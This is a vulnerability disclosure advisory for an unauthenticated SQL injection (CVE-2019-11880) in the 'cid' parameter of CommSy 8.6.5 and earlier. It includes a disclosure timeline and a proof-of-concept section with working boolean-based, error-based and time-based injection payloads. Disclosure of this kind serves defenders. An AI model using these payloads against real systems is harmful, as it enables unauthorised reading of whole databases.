Title:======
CommSy 8.6.5- SQL injection
Researcher:===========
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
CVE-ID:=======
CVE-2019-11880
Timeline:=========2019-04-15 Vulnerability discovered
2019-04-15 Asked for security contact and PGP key
2019-04-16 Send details to the vendor
2019-05-07 Flaw was approved but will not be fixed in branch 8.62019-05-15 Public disclosure
Affected Products:==================
CommSy <=8.6.5
Vendor Homepage:================
Startseite
Details:========
CommSy is a web-based community system, originally developed at the
University of Hamburg, Germany, to support learning/working communities.
We have discovered a unauthenticated SQL injection vulnerability in
CommSy <=8.6.5 that makes it possible to read all database content. The
vulnerability exists in the HTTP GET parameter "cid".
Proof of Concept:=================
boolean-based blind:
commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823
ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login
error-based:
commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT
COUNT(*),CONCAT(0x716a767871,(SELECT
(ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login
time-based blind:
commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login
Fix:====
According to the manufacturer, the version branch 8.6is no longer
supported and the vulnerability will not be fixed. Customers should
update to the newest version 9.2.
